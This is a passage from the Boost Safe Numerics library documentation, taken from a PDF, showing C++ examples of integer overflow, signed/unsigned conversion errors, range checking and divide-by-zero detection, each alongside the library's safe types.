wrong to begin\nwith - for example divide by zero. Some runtime environments will just terminate the program, others may throw some sort of\nexception. In any case, the execution has failed in a manner from which there is no recovery.\nAll of the above conditions are obstacles to creation of a program which will never fail. The Safe Numerics Library addresses all\nof these conditions, at least as far as integer operations are concerned.\nSince the problems and their solution are similar, we'll confine the current discussion to just the one example shown above.\n1.2. Solution\nThis library implements special versions of int, unsigned , etc. which behave exactly like the original ones except that the\nresults of these operations are guaranteed to be either to be arithmetically correct or invoke an error. Using this library, the above\nexample would be rendered as:\n#include <boost/safe_numerics /safe_integer .hpp>\nusing namespace boost::safe_numerics ;\nsafe<int> f(safe<int> x, safe<int> y){\n return x + y; // throw exception if correct result cannot be returned\n}\nNote\nLibrary code in this document resides in the namespace boost::safe_numerics . This namespace has\ngenerally been eliminated from text, code and examples in order to improve readability of the text.\nThe addition expression is checked at runtime or (if possible) at compile time to trap any possible errors resulting in incorrect\narithmetic behavior. Arithmetic expressions will not produce an erroneous result. Instead, one and only one of the following is\nguaranteed to occur.\n•the expression will yield the correct mathematical result\n•the expression will emit a compilation error.\n•the expression will invoke a runtime exception.\nIn other words, the library absolutely guarantees that no integer arithmetic expression will yield incorrect results .\n1.3. How It Works\nThe library implements special versions of int, unsigned , etc. Named safe<int> , safe<unsigned int> etc. These behave\nexactly like the underlying types except that expressions using these types fulfill the above guarantee. These \"safe\" types are\nmeant to be \"drop-in\" replacements for the built-in types of the same name. So things which are legal - such as assignment of a\nsigned to unsigned value - are not trapped at compile time as they are legal C/C++ code. Instead, they are checked at runtime\nto trap the case where this (legal) operation would lead to an arithmetically incorrect result.\nNote that the library addresses arithmetical errors generated by straightforward C/C++ expressions. Some of these arithmetic\nerrors are defined as conforming to the C/C++ standards while others are not. So characterizing this library as only addressing\nundefined behavior of C/C++ numeric expressions would be misleading.\nFacilities particular to C++14 are employed to minimize any runtime overhead. In many cases there is no runtime overhead at all.\nIn other cases, a program using the library can be slightly altered to achieve the above guarantee without any runtime overhead.\n5Safe Numerics\n1.4. Additional Features\nOperation of safe types is determined by template parameters which specify a pair of policy classes which specify the behavior\nfor type promotion and error handling. In addition to the usage serving as a drop-in replacement for standard integer types, users\nof the library can:\n•Select or define an exception policy class to specify handling of exceptions.\n•Throw exception on runtime, trap at compile time if possible.\n•Trap at compile time all operations which could possibly fail at runtime.\n•Specify custom functions which should be called in case errors are detected at runtime.\n•Select or define a promotion policy class to alter the C/C++ type promotion rules. This can be used to\n•Use C/C++ native type promotion rules so that, except for throwing/trapping of exceptions on operations resulting in\nincorrect arithmetic behavior, programs will operate identically when using/not using safe types. This might be used if safe\ntypes are only enabled during debug and testing.\n•Replace C/C++ native promotion rules with ones which are arithmetically equivalent but minimize the need for runtime\nchecking of arithmetic results. Such a policy will effectively change the semantics of a C++ program. It's not really C++ any\nmore. The program cannot be expected to function the same as when normal integer types are used.\n•Replace C/C++ native promotion rules with ones which emulate other machine architectures. This is designed to permit the\ntesting of C/C++ code destined to be run on another machine on one's development platform. Such a situation often occurs\nwhile developing code for embedded systems.\n•Enforce other program requirements using bounded integer types. The library includes the types for ranges and literals.\nOperations which violate these requirements will be trapped at either compile time or runtime and not silently return invalid\nvalues. These types can be used to improve program correctness and performance.\n1.5. Requirements\nThis library is composed entirely of C++ Headers. It requires a compiler compatible with the C++14 standard.\nThe following Boost Libraries must be installed in order to use this library\n•mp11\n•integer\n•config\n•tribool\n•enable_if\n•type_traits\nThe Safe Numerics library is delivered with an exhaustive suite of test programs.\n1.6. Scope\nThis library currently applies only to built-in integer types. Analogous issues arise for floating point types but they are not\ncurrently addressed by this version of the library. User or library defined types such as arbitrary precision integers can also have\n6Safe Numerics\nthis problem. Extension of this library to these other types is not currently under development but may be addressed in the future.\nThis is one reason why the library name is \"safe numeric\" rather than \"safe integer\" library.\n2. Tutorial and Motivating Examples\n2.1. Arithmetic Expressions Can Yield Incorrect Results\nWhen some operation on signed integer types results in a result which exceeds the capacity of a data variable to hold it, the\nresult is undefined. In the case of unsigned integer types a similar situation results in a value wrap as per modulo arithmetic. In\neither case the result is different than in integer number arithmetic in the mathematical sense. This is called \"overflow\". Since\nword size can differ between machines, code which produces mathematically correct results in one set of circumstances may fail\nwhen re-compiled on a machine with different hardware. When this occurs, most C++ programs will continue to execute with no\nindication that the results are wrong. It is the programmer's responsibility to ensure such undefined behavior is avoided.\nThis program demonstrates this problem. The solution is to replace instances of built in integer types with corresponding safe\ntypes.\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <iostream >\n#include <boost/safe_numerics /safe_integer .hpp>\nint main(int, const char *[]){\n std::cout << \"example 1:\" ;\n std::cout << \"undetected erroneous expression evaluation\" << std::endl;\n std::cout << \"Not using safe numerics\" << std::endl;\n try{\n std::int8_t x = 127;\n std::int8_t y = 2;\n std::int8_t z;\n // this produces an invalid result !\n z = x + y;\n std::cout << \"error NOT detected!\" << std::endl;\n std::cout << (int)z << \" != \" << (int)x << \" + \" << (int)y << std::endl;\n }\n catch (const std::exception &){\n std::cout << \"error detected!\" << std::endl;\n }\n // solution: replace int with safe<int>\n std::cout << \"Using safe numerics\" << std::endl;\n try{\n using namespace boost::safe_numerics ;\n safe<std::int8_t > x = INT_MAX ;\n safe<std::int8_t > y = 2;\n safe<std::int8_t > z;\n // rather than producing an invalid result an exception is thrown\n z = x + y;\n }\n catch (const std::exception & e){\n // which we can catch here\n std::cout << \"error detected:\" << e.what() << std::endl;\n7Safe Numerics\n }\n return 0;\n}\nexample 1:undetected erroneous expression evaluation\nNot using safe numerics\nerror NOT detected!\n-127 != 127 + 2\nUsing safe numerics\nerror detected:converted signed value too large: positive overflow error\nProgram ended with exit code: 0\n2.2. Arithmetic Operations Can Overflow Silently\nA variation of the above is when a value is incremented/decremented beyond its domain.\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <iostream >\n#include <boost /safe_numerics /safe_integer .hpp>\nint main(int, const char *[]){\n std::cout << \"example 2:\" ;\n std::cout << \"undetected overflow in data type\" << std::endl;\n // problem: undetected overflow\n std::cout << \"Not using safe numerics\" << std::endl;\n try{\n int x = INT_MAX ;\n // the following silently produces an incorrect result\n ++x;\n std::cout << x << \" != \" << INT_MAX << \" + 1\" << std::endl;\n std::cout << \"error NOT detected!\" << std::endl;\n }\n catch (const std::exception &){\n std::cout << \"error detected!\" << std::endl;\n }\n // solution: replace int with safe<int>\n std::cout << \"Using safe numerics\" << std::endl;\n try{\n using namespace boost::safe_numerics ;\n safe<int> x = INT_MAX ;\n // throws exception when result is past maximum possible \n ++x;\n assert (false); // never arrive here\n }\n catch (const std::exception & e){\n std::cout << e.what() << std::endl;\n std::cout << \"error detected!\" << std::endl;\n }\n return 0;\n}\n8Safe Numerics\nexample 2:undetected overflow in data type\nNot using safe numerics\n-2147483648 != 2147483647 + 1\nerror NOT detected!\nUsing safe numerics\naddition result too large\nerror detected!\nWhen variables of unsigned integer type are decremented below zero, they \"roll over\" to the highest possible unsigned version of\nthat integer type. This is a common problem which is generally never detected.\n2.3. Arithmetic on Unsigned Integers Can Yield Incorrect\nResults\nSubtracting two unsigned values of the same size will result in an unsigned value. If the first operand is less than the second\nthe result will be arithmetically in correct. But if the size of the unsigned types is less than that of an unsigned int , C/C++\nwill promote the types to signed int before subtracting resulting in an correct result. In either case, there is no indication of\nan error. Somehow, the programmer is expected to avoid this behavior. Advice usually takes the form of \"Don't use unsigned\nintegers for arithmetic\". This is well and good, but often not practical. C/C++ itself uses unsigned for sizeof(T) which is then\nused by users in arithmetic.\nThis program demonstrates this problem. The solution is to replace instances of built in integer types with corresponding safe\ntypes.\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <iostream >\n#include <boost/safe_numerics /safe_integer .hpp>\nint main(int, const char *[]){\n std::cout << \"example 8:\" ;\n std::cout << \"undetected erroneous expression evaluation\" << std::endl;\n std::cout << \"Not using safe numerics\" << std::endl;\n try{\n unsigned int x = 127;\n unsigned int y = 2;\n unsigned int z;\n // this produces an invalid result !\n z = y - x;\n std::cout << \"error NOT detected!\" << std::endl;\n std::cout << z << \" != \" << y << \" - \" << x << std::endl;\n }\n catch (const std::exception &){\n std::cout << \"error detected!\" << std::endl;\n }\n // solution: replace int with safe<int>\n std::cout << \"Using safe numerics\" << std::endl;\n try{\n using namespace boost::safe_numerics ;\n safe<unsigned int> x = 127;\n9Safe Numerics\n safe<unsigned int> y = 2;\n safe<unsigned int> z;\n // rather than producing an invalid result an exception is thrown\n z = y - x;\n std::cout << \"error NOT detected!\" << std::endl;\n std::cout << z << \" != \" << y << \" - \" << x << std::endl;\n }\n catch (const std::exception & e){\n // which we can catch here\n std::cout << \"error detected:\" << e.what() << std::endl;\n }\n return 0;\n}\nexample 8:undetected erroneous expression evaluation\nNot using safe numerics\nerror NOT detected!\n4294967171 != 2 - 127\nUsing safe numerics\nerror detected:subtraction result cannot be negative: negative overflow error\nProgram ended with exit code: 0\n2.4. Implicit Conversions Can Lead to Erroneous Results\nAt CPPCon 2016 Jon Kalb gave a very entertaining (and disturbing) lightning talk related to C++ expressions.\nThe talk included a very, very simple example similar to the following:\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <iostream >\n#include <boost /safe_numerics /safe_integer .hpp>\nint main(){\n std::cout << \"example 4: \" ;\n std::cout << \"implicit conversions change data values\" << std::endl;\n std::cout << \"Not using safe numerics\" << std::endl;\n \n // problem: implicit conversions change data values\n try{\n signed int a{-1};\n unsigned int b{1};\n std::cout << \"a is \" << a << \" b is \" << b << '\\n';\n if(a < b){\n std::cout << \"a is less than b\\n\" ;\n }\n else{\n std::cout << \"b is less than a\\n\" ;\n }\n std::cout << \"error NOT detected!\" << std::endl;\n }\n catch (const std::exception &){\n10Safe Numerics\n // never arrive here - just produce the wrong answer!\n std::cout << \"error detected!\" << std::endl;\n return 1;\n }\n // solution: replace int with safe<int> and unsigned int with safe<unsigned int>\n std::cout << \"Using safe numerics\" << std::endl;\n try{\n using namespace boost::safe_numerics ;\n safe<signed int> a{-1};\n safe<unsigned int> b{1};\n std::cout << \"a is \" << a << \" b is \" << b << '\\n';\n if(a < b){\n std::cout << \"a is less than b\\n\" ;\n }\n else{\n std::cout << \"b is less than a\\n\" ;\n }\n std::cout << \"error NOT detected!\" << std::endl;\n return 1;\n }\n catch (const std::exception & e){\n // never arrive here - just produce the correct answer!\n std::cout << e.what() << std::endl;\n std::cout << \"error detected!\" << std::endl;\n }\n return 0;\n}\nexample 3: implicit conversions change data values\nNot using safe numerics\na is -1 b is 1\nb is less than a\nerror NOT detected!\nUsing safe numerics\na is -1 b is 1\nconverted negative value to unsigned: domain error\nerror detected!\nA normal person reads the above code and has to be dumbfounded by this. The code doesn't do what the text - according to the\nrules of algebra - says it does. But C++ doesn't follow the rules of algebra - it has its own rules. There is generally no compile\ntime error. You can get a compile time warning if you set some specific compile time switches. The explanation lies in reviewing\nhow C++ reconciles binary expressions ( a < b is an expression here) where operands are different types. In processing this\nexpression, the compiler:\n•Determines the \"best\" common type for the two operands. In this case, application of the rules in the C++ standard dictate that\nthis type will be an unsigned int .\n•Converts each operand to this common type. The signed value of -1 is converted to an unsigned value with the same bit-wise\ncontents, 0xFFFFFFFF, on a machine with 32 bit integers. This corresponds to a decimal value of 4294967295.\n•Performs the calculation - in this case it's <, the \"less than\" operation. Since 1 is less than 4294967295 the program prints \"b is\nless than a\".\nIn order for a programmer to detect and understand this error he should be pretty familiar with the implicit conversion rules of\nthe C++ standard. These are available in a copy of the standard and also in the canonical reference book The C++ Programming\nLanguage (both are over 1200 pages long!). Even experienced programmers won't spot this issue and know to take precautions to\n11Safe Numerics\navoid it. And this is a relatively easy one to spot. In the more general case this will use integers which don't correspond to easily\nrecognizable numbers and/or will be buried as a part of some more complex expression.\nThis example generated a good amount of web traffic along with everyone's pet suggestions. See for example a blog post with\neveryone's favorite \"solution\" . All the proposed \"solutions\" have disadvantages and attempts to agree on how handle this are\nultimately fruitless in spite of, or maybe because of, the emotional content . Our solution is by far the simplest: just use the safe\nnumerics library as shown in the example above.\nNote that in this particular case, usage of the safe types results in no runtime overhead in using the safe integer library. Code\ngenerated will either equal or exceed the efficiency of using primitive integer types.\n2.5. Mixing Data Types Can Create Subtle Errors\nC++ contains signed and unsigned integer types. In spite of their names, they function differently which often produces\nsurprising results for some operands. Program errors from this behavior can be exceedingly difficult to find. This has lead to\nrecommendations of various ad hoc \"rules\" to avoid these problems. It's not always easy to apply these \"rules\" to existing code\nwithout creating even more bugs. Here is a typical example of this problem:\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <iostream >\n#include <cstdint >\n#include <boost /safe_numerics /safe_integer .hpp>\nusing namespace std;\nusing namespace boost::safe_numerics ;\nvoid f(const unsigned int & x, const int8_t & y){\n cout << x * y << endl;\n}\nvoid safe_f (\n const safe<unsigned int> & x,\n const safe<int8_t > & y\n){\n cout << x * y << endl;\n}\nint main(){\n cout << \"example 4: \" ;\n cout << \"mixing types produces surprising results\" << endl;\n try {\n std::cout << \"Not using safe numerics\" << std::endl;\n // problem: mixing types produces surprising results.\n f(100, 100); // works as expected\n f(100, -100); // wrong result - unnoticed\n cout << \"error NOT detected!\" << endl;;\n }\n catch (const std::exception & e){\n // never arrive here\n cout << \"error detected:\" << e.what() << endl;;\n }\n try {\n // solution: use safe types\n12Safe Numerics\n std::cout << \"Using safe numerics\" << std::endl;\n safe_f (100, 100); // works as expected\n safe_f (100, -100); // throw error\n cout << \"error NOT detected!\" << endl;;\n }\n catch (const std::exception & e){\n cout << \"error detected:\" << e.what() << endl;;\n }\n return 0;\n}\nHere is the output of the above program:\nexample 4: mixing types produces surprising results\nNot using safe numerics\n10000\n4294957296\nerror NOT detected!\nUsing safe numerics\n10000\nerror detected!converted negative value to unsigned: domain error\nThis solution is simple, just replace instances of int with safe<int> .\n2.6. Array Index Value Can Exceed Array Limits\nUsing an intrinsic C++ array, it's very easy to exceed array limits. This can fail to be detected when it occurs and create bugs\nwhich are hard to find. There are several ways to address this, but one of the simplest would be to use safe_unsigned_range;\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <stdexcept >\n#include <iostream >\n#include <array>\n#include <boost/safe_numerics /safe_integer_range .hpp>\nvoid detected_msg (bool detected ){\n std::cout << (detected ? \"error detected!\" : \"error NOT detected! \" ) << std::endl;\n}\nint main(int, const char *[]){\n // problem: array index values can exceed array bounds\n std::cout << \"example 5: \" ;\n std::cout << \"array index values can exceed array bounds\" << std::endl;\n std::cout << \"Not using safe numerics\" << std::endl;\n std::array<int, 37> i_array ;\n // unsigned int i_index = 43;\n // the following corrupts memory.\n // This may or may not be detected at run time.\n // i_array[i_index] = 84; // comment this out so it can be tested!\n13Safe Numerics\n std::cout << \"error NOT detected!\" << std::endl;\n // solution: replace unsigned array index with safe_unsigned_range\n std::cout << \"Using safe numerics\" << std::endl;\n try{\n using namespace boost::safe_numerics ;\n using i_index_t = safe_unsigned_range <0, i_array .size() - 1>;\n i_index_t i_index ;\n i_index = 36; // this works fine\n i_array [i_index ] = 84;\n i_index = 43; // throw exception here!\n std::cout << \"error NOT detected!\" << std::endl; // so we never arrive here\n }\n catch (const std::exception & e){\n std::cout << \"error detected:\" << e.what() << std::endl;\n }\n return 0;\n}\nexample 5: array index values can exceed array bounds\nNot using safe numerics\nerror NOT detected!\nUsing safe numerics\nerror detected:Value out of range for this safe type: domain error\nCollections like standard arrays and vectors do array index checking in some function calls and not in others so this may not\nbe the best example. However it does illustrate the usage of safe_range<T> for assigning legal ranges to variables. This will\nguarantee that under no circumstances will the variable contain a value outside of the specified range.\n2.7. Checking of Input Values Can Be Easily Overlooked\nIt's way too easy to overlook the checking of parameters received from outside the current program.\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <stdexcept >\n#include <sstream >\n#include <iostream >\n#include <boost /safe_numerics /safe_integer .hpp>\nint main(int, const char *[]){\n // problem: checking of externally produced value can be overlooked\n std::cout << \"example 6: \" ;\n std::cout << \"checking of externally produced value can be overlooked\" << std::endl;\n std::cout << \"Not using safe numerics\" << std::endl;\n std::istringstream is(\"12317289372189 1231287389217389217893\" );\n try{\n int x, y;\n is >> x >> y; // get integer values from the user\n std::cout << x << ' ' << y << std::endl;\n14Safe Numerics\n std::cout << \"error NOT detected!\" << std::endl;\n }\n catch (const std::exception &){\n std::cout << \"error detected!\" << std::endl;\n }\n // solution: assign externally retrieved values to safe equivalents\n std::cout << \"Using safe numerics\" << std::endl;\n {\n using namespace boost::safe_numerics ;\n safe<int> x, y;\n is.seekg(0);\n try{\n is >> x >> y; // get integer values from the user\n std::cout << x << ' ' << y << std::endl;\n std::cout << \"error NOT detected!\" << std::endl;\n }\n catch (const std::exception & e){\n std::cout << \"error detected:\" << e.what() << std::endl;\n }\n }\n return 0;\n}\nexample 6: checking of externally produced value can be overlooked\nNot using safe numerics\n2147483647 0\nerror NOT detected!\nUsing safe numerics\nerror detected:error in file input: domain error\nWithout safe integer, one will have to insert new code every time an integer variable is retrieved. This is a tedious and error prone\nprocedure. Here we have used program input. But in fact this problem can occur with any externally produced input.\n2.8. Cannot Recover From Arithmetic Errors\nIf a divide by zero error occurs in a program, it's detected by hardware. The way this manifests itself to the program can and will\ndepend upon\n•data type - int, float, etc\n•setting of compile time command line switches\n•invocation of some configuration functions which convert these hardware events into C++ exceptions\nIt's not all that clear how one would detect and recover from a divide by zero error in a simple portable way. Usually, users just\nignore the issue which usually results in immediate program termination when this situation occurs.\nThis library will detect divide by zero errors before the operation is invoked. Any errors of this nature are handled according to\nthe exception_policy selected by the library user.\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n15Safe Numerics\n#include <stdexcept >\n#include <iostream >\n#include <boost /safe_numerics /safe_integer .hpp>\nint main(int, const char *[]){\n // problem: cannot recover from arithmetic errors\n std::cout << \"example 7: \" ;\n std::cout << \"cannot recover from arithmetic errors\" << std::endl;\n std::cout << \"Not using safe numerics\" << std::endl;\n try{\n // can't do this as it will crash the program with no\n // opportunity for recovery - comment out for example\n // int x = 1;\n // int y = 0;\n // std::cout << x / y;\n std::cout << \"error cannot be handled at runtime!\" << std::endl;\n }\n catch (const std::exception &){\n std::cout << \"error handled at runtime!\" << std::endl;\n }\n // solution: replace int with safe<int>\n std::cout << \"Using safe numerics\" << std::endl;\n try{\n using namespace boost::safe_numerics ;\n const safe<int> x = 1;\n const safe<int> y = 0;\n std::cout << x / y;\n std::cout << \"error NOT detected!\" << std::endl;\n }\n catch (const std::exception & e){\n std::cout << \"error handled at runtime!\" << e.what() << std::endl;\n }\n return 0;\n}\nexample 7: cannot recover from arithmetic errors\nNot using safe numerics\nerror NOT detectable!\nUsing safe numerics\nerror detected:divide by zero: domain error\n2.9. Compile Time Arithmetic is Not Always Correct\nIf a divide by zero error occurs while a program is being compiled, there is not guarantee that it will be detected. This example\nshows a real example compiled with a recent version of CLang.\n•Source code includes a constant expression containing a simple arithmetic error.\n•The compiler emits a warning but otherwise calculates the wrong result.\n•Replacing int with safe<int> will guarantee that the error is detected at runtime\n•Operations using safe types are marked constexpr. So we can force the operations to occur at runtime by marking the results as\nconstexpr. This will result in an error at compile time if the operations cannot be correctly calculated.\n16Safe Numerics\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <stdexcept >\n#include <iostream >\n#include <boost/safe_numerics /safe_integer .hpp>\nint main(int, const char *[]){\n // problem: cannot recover from arithmetic errors\n std::cout << \"example 14: \" ;\n std::cout << \"cannot detect compile time arithmetic errors\" << std::endl;\n std::cout << \"Not using safe numerics\" << std::endl;\n try{\n const int x = 1;\n const int y = 0;\n // will emit warning at compile time\n // will leave an invalid result at runtime.\n std::cout << x / y; // will display \"0\"!\n std::cout << \"error NOT detected!\" << std::endl;\n }\n catch (const std::exception &){\n std::cout << \"error detected!\" << std::endl;\n }\n // solution: replace int with safe<int>\n std::cout << \"Using safe numerics\" << std::endl;\n try{\n using namespace boost::safe_numerics ;\n const safe<int> x = 1;\n const safe<int> y = 0;\n // constexpr const safe<int> z = x / y; // note constexpr here!\n std::cout << x / y; // error would be detected at runtime\n std::cout << \" error NOT detected!\" << std::endl;\n }\n catch (const std::exception & e){\n std::cout << \"error detected:\" << e.what() << std::endl;\n }\n return 0;\n}\nexample 8: cannot detect compile time arithmetic errors\nNot using safe numerics\n0error NOT detected!\nUsing safe numerics\nerror detected:positive overflow error\nProgram ended with exit code: 0\n2.10. Programming by Contract is Too Slow\nProgramming by Contract is a highly regarded technique. There has been much written about it and it has been proposed as an\naddition to the C++ language [ Garcia][Crowl & Ottosen ] It (mostly) depends upon runtime checking of parameter and object\nvalues upon entry to and exit from every function. This can slow the program down considerably which in turn undermines the\nmain motivation for using C++ in the first place! One popular scheme for addressing this issue is to enable parameter checking\n17Safe Numerics\nonly during debugging and testing which defeats the guarantee of correctness which we are seeking here! Programming by\nContract will never be accepted by programmers as long as it is associated with significant additional runtime cost.\nThe Safe Numerics Library has facilities which, in many cases, can check guaranteed parameter requirements with little or no\nruntime overhead. Consider the following example:\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <cassert >\n#include <stdexcept >\n#include <sstream >\n#include <iostream >\n#include <boost /safe_numerics /safe_integer_range .hpp>\n// NOT using safe numerics - enforce program contract explicitly\n// return total number of minutes\nunsigned int contract_convert (\n const unsigned int & hours,\n const unsigned int & minutes\n) {\n // check that parameters are within required limits\n // invokes a runtime cost EVERYTIME the function is called\n // and the overhead of supporting an interrupt.\n // note high runtime cost!\n if(minutes > 59)\n throw std::domain_error (\"minutes exceeded 59\" );\n if(hours > 23)\n throw std::domain_error (\"hours exceeded 23\" );\n return hours * 60 + minutes ;\n}\n// Use safe numerics to enforce program contract automatically\n// define convenient typenames for hours and minutes hh:mm\nusing hours_t = boost::safe_numerics ::safe_unsigned_range <0, 23>;\nusing minutes_t = boost::safe_numerics ::safe_unsigned_range <0, 59>;\nusing minutes_total_t = boost::safe_numerics ::safe_unsigned_range <0, 59>;\n// return total number of minutes\n// type returned is safe_unsigned_range<0, 24*60 - 1>\nauto convert (const hours_t & hours, const minutes_t & minutes ) {\n // no need to test pre-conditions\n // input parameters are guaranteed to hold legitimate values\n // no need to test post-conditions\n // return value guaranteed to hold result\n return hours * 60 + minutes ;\n}\nunsigned int test1(unsigned int hours, unsigned int minutes ){\n // problem: checking of externally produced value can be expensive\n // invalid parameters - detected - but at a heavy cost\n return contract_convert (hours, minutes );\n}\nauto test2(unsigned int hours, unsigned int minutes ){\n18Safe Numerics\n // solution: use safe numerics\n // safe types can be implicitly constructed base types\n // construction guarentees corectness\n // return value is known to fit in unsigned int\n return convert (hours, minutes );\n}\nauto test3(unsigned int hours, unsigned int minutes ){\n // actually we don't even need the convert function any more\n return hours_t (hours) * 60 + minutes_t (minutes );\n}\nint main(int, const char *[]){\n std::cout << \"example 7: \" ;\n std::cout << \"enforce contracts with zero runtime cost\" << std::endl;\n unsigned int total_minutes ;\n try {\n total_minutes = test3(17, 83);\n std::cout << \"total minutes = \" << total_minutes << std::endl;\n }\n catch (const std::exception & e){\n std::cout << \"parameter error detected\" << std::endl;\n }\n try {\n total_minutes = test3(17, 10);\n std::cout << \"total minutes = \" << total_minutes << std::endl;\n }\n catch (const std::exception & e){\n // should never arrive here\n std::cout << \"parameter error erroneously detected\" << std::endl;\n return 1;\n }\n return 0;\n}\nexample 7: \nenforce contracts with zero runtime cost\nparameter error detected\nIn the example above, the function convert incurs significant runtime cost every time the function is called. By using \"safe\"\ntypes, this cost is moved to the moment when the parameters are constructed. Depending on how the program is constructed, this\nmay totally eliminate extraneous computations for parameter requirement type checking. In this scenario, there is no reason to\nsuppress the checking for release mode and our program can be guaranteed to be always arithmetically correct.\n3. Eliminating Runtime Penalty\nUp until now, we've mostly focused on detecting when incorrect results are produced and handling these occurrences either by\nthrowing an exception or invoking some designated function. We've achieved our goal of detecting and handling arithmetically\nincorrect behavior - but at cost of checking many arithmetic operations at runtime. It is a fact that many C++ programmers will\nfind this trade-off unacceptable. So the question arises as to how we might minimize or eliminate this runtime penalty.\nThe first step is to determine what parts of a program might invoke exceptions. The following program is similar to previous\nexamples but uses a special exception policy: loose_trap_policy .\n19Safe Numerics\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <iostream >\n#include <boost /safe_numerics /safe_integer .hpp>\n#include <boost /safe_numerics /exception_policies .hpp> // include exception policies\nusing safe_t = boost::safe_numerics ::safe<\n int,\n boost ::safe_numerics ::native ,\n boost ::safe_numerics ::loose_trap_policy // note use of \"loose_trap_exception\" policy!\n>;\nint main(){\n std::cout << \"example 81:\\n\" ;\n safe_t x(INT_MAX );\n safe_t y(2);\n safe_t z = x + y; // will fail to compile !\n return 0;\n}\nNow, any expression which might fail at runtime is flagged with a compile time error. There is no longer any need for try/\ncatch blocks. Since this program does not compile, the library absolutely guarantees that no arithmetic expression will yield\nincorrect results . Furthermore, it is absolutely guaranteed that no exception will ever be thrown . This is our original goal.\nNow all we need to do is make the program compile. There are a couple of ways to achieve this.\n3.1. Using safe_range and safe_literal\nWhen trying to avoid arithmetic errors of the above type, programmers will select data types which are wide enough to hold\nvalues large enough to be certain that results won't overflow, but are not so large as to make the program needlessly inefficient.\nIn the example below, we presume we know that the values we want to work with fall in the range [-24,82]. So we \"know\" the\nprogram will always result in a correct result. But since we trust no one, and since the program could change and the expressions\nbe replaced with other ones, we'll still use the loose_trap_policy exception policy to verify at compile time that what we\n\"know\" to be true is in fact true.\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <iostream >\n#include <boost /safe_numerics /safe_integer_range .hpp>\n#include <boost /safe_numerics /safe_integer_literal .hpp>\n#include <boost /safe_numerics /exception .hpp>\n#include <boost /safe_numerics /native .hpp>\n#include \"safe_format.hpp\" // prints out range and value of any type\nusing namespace boost::safe_numerics ;\n20Safe Numerics\n// create a type for holding small integers in a specific range\nusing safe_t = safe_signed_range <\n -24,\n 82,\n native , // C++ type promotion rules work OK for this example\n loose_trap_policy // catch problems at compile time\n>;\n// create a type to hold one specific value\ntemplate <int I>\nusing const_safe_t = safe_signed_literal <I, native , loose_trap_policy >;\n// We \"know\" that C++ type promotion rules will work such that\n// addition will never overflow. If we change the program to break this,\n// the usage of the loose_trap_policy promotion policy will prevent compilation.\nint main(int, const char *[]){\n std::cout << \"example 83:\\n\" ;\n constexpr const const_safe_t <10> x;\n std::cout << \"x = \" << safe_format (x) << std::endl;\n constexpr const const_safe_t <67> y;\n std::cout << \"y = \" << safe_format (y) << std::endl;\n auto zx = x + y;\n const safe_t z = zx;\n //auto z = x + y;\n std::cout << \"x + y = \" << safe_format (x + y) << std::endl;\n std::cout << \"z = \" << safe_format (z) << std::endl;\n return 0;\n}\n•safe_signed_range defines a type which is limited to the indicated range. Out of range assignments will be detected at\ncompile time if possible (as in this case) or at run time if necessary.\n•A safe range could be defined with the same minimum and maximum value effectively restricting the type to holding one\nspecific value. This is what safe_signed_literal does.\n•Defining constants with safe_signed_literal enables the library to correctly anticipate the correct range of the results of\narithmetic expressions at compile time.\n•The usage of loose_trap_policy will mean that any assignment to z which could be outside its legal range will result in a\ncompile time error.\n•All safe integer operations are implemented as constant expressions. The usage of constexpr will guarantee that z will be\navailable at compile time for any subsequent use.\n•So if this program compiles, it's guaranteed to return a valid result.\nThe output uses a custom output manipulator, safe_format , for safe types to display the underlying type and its range as well as\ncurrent value. This program produces the following run time output.\nexample 83:\nx = <signed char>[10,10] = 10\ny = <signed char>[67,67] = 67\nx + y = <int>[77,77] = 77\nz = <signed char>[-24,82] = 77\nTake note of the various variable types:\n21Safe Numerics\n•x and y are safe types with fixed ranges which encompass one single value. They can hold only that value which they have\nbeen assigned at compile time.\n•The sum x + y can also be determined at compile time.\n•The type of z is defined so that It can hold only values in the closed range -24,82. We can assign the sum of x + y because it is\nin the range that z is guaranteed to hold. If the sum could not be be guaranteed to fall in the range of z, we would get a compile\ntime error due to the fact we are using the loose_trap_policy exception policy.\nAll this information regarding the range and values of variables has been determined at compile time. There is no runtime\noverhead. The usage of safe types does not alter the calculations or results in anyway. So safe_t and const_safe_t could be\nredefined to int and const int respectively and the program would operate identically 